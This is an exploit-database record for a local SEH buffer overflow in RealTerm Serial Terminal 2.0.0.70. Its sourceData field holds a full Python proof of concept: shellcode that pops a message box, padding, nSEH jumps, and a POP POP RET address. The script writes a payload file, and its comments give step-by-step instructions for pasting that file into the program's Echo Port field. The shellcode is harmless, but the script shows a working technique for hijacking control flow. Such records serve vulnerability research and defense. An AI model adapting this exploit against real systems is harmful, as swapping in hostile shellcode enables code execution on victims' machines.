Description
RealTerm Serial Terminal 2.0.0.70 - Echo Port Buffer Overflow (SEH)
{"lastseen": "2020-04-01T19:04:45", "references": [], "description": "\nRealTerm Serial Terminal 2.0.0.70 - Echo Port Buffer Overflow (SEH)", "edition": 1, "reporter": "Matteo Malvica", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2019-02-21T00:00:00", "title": "RealTerm Serial Terminal 2.0.0.70 - Echo Port Buffer Overflow (SEH)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2019-02-21T00:00:00", "id": "EXPLOITPACK:128D323E980CE6E8B60B30CF657BC0B3", "href": "", "viewCount": 6, "sourceData": "# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) \n# Date: 21.02.2019\n# Exploit Author: Matteo Malvica\n# Vendor Homepage: https://realterm.sourceforge.io/\n# Software Link: https://sourceforge.net/projects/realterm/files/ \n# Version: 2.0.0.70\n# Category: Local\n# Contact: https://twitter.com/matteomalvica\n# Version: CloudMe Sync 1.11.2\n# Tested on: Windows 7 SP1 x64\n# Original PoC https://www.exploit-db.com/exploits/46391\n\n# 1.- Run the python script it will create a new file \"carbonara.txt\"\n# 2.- Copy the content of the new file 'carbonara.txt' to clipboard\n# 3.- Open realterm.exe \n# 4.- Go to 'Echo Port' tab\n# 5.- Paste clipboard in 'Port' field\n# 6.- Click on button -> Change\n# 7.- Check 'Echo On' or \n# 8.- Box!\n\n\nimport socket\nimport struct\n\n'''\nbadchars: 0x20,0x0a\narwin.exe user32.dll MessageBoxA\narwin - win32 address resolution program - by steve hanna - v.01\nMessageBoxA is located at 0x747cfdae in user32.dll\n'''\nshellcode = (\n\"\\x33\\xc0\" # XOR EAX,EAX\n\"\\x50\" # PUSH EAX => padding for lpCaption\n\"\\x68\\x7a\\x6f\\x21\\x21\" # PUSH \"zo!!\"\n\"\\x68\\x61\\x76\\x61\\x6e\" # PUSH \"avan\"\n\"\\x8B\\xCC\" # MOV ECX,ESP => PTR to lpCaption\n\"\\x50\" # PUSH EAX => padding for lpText\n\"\\x68\\x6e\\x7a\\x6f\\x21\" # PUSH \"nzo!\"\n\"\\x68\\x61\\x76\\x61\\x21\" # PUSH \"ava!\"\n\"\\x8B\\xD4\" # MOV EDX,ESP => PTR to lpText\n\"\\x50\" # PUSH EAX - uType=0x0\n\"\\x51\" # PUSH ECX - lpCaption\n\"\\x52\" # PUSH EDX - lpText\n\"\\x50\" # PUSH EAX - hWnd=0x0\n\"\\xBE\\xae\\xfd\\x7c\\x74\" # MOV ESI,USER32.MessageBoxA <<< hardcoded address\n\"\\xFF\\xD6\") # CALL ESI\n\npad1=\"\\x90\"*(142-len(shellcode))\npad2 = \"\\x42\" * 118\nnseh = \"\\xEB\\x80\\x90\\x90\"\njmp_back = \"\\xEB\\x80\\x90\\x90\"\nshort_jmp = \"\\xEB\\x12\\x90\\x90\"\nseh = struct.pack('<L',0x00406e27) # 00406e27# POP POP RET\nnops = \"\\x90\\x90\\x90\\x90\"\npayload = pad1 + shellcode + nops + jmp_back + pad2 + nseh + seh \n\n\ntry:\n f=open(\"carbonara.txt\",\"w\")\n print \"[+] Creating %s bytes pasta payload..\" %len(payload)\n f.write(payload)\n f.close()\n print \"[+] Carbonara created!\"\n\nexcept:\n print \"Carbonara cannot be created\"", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645843552, "score": 1659814272}, "_internal": {"score_hash": "4aa03b6664e33404fbf2b20d6ef4e570"}}
{}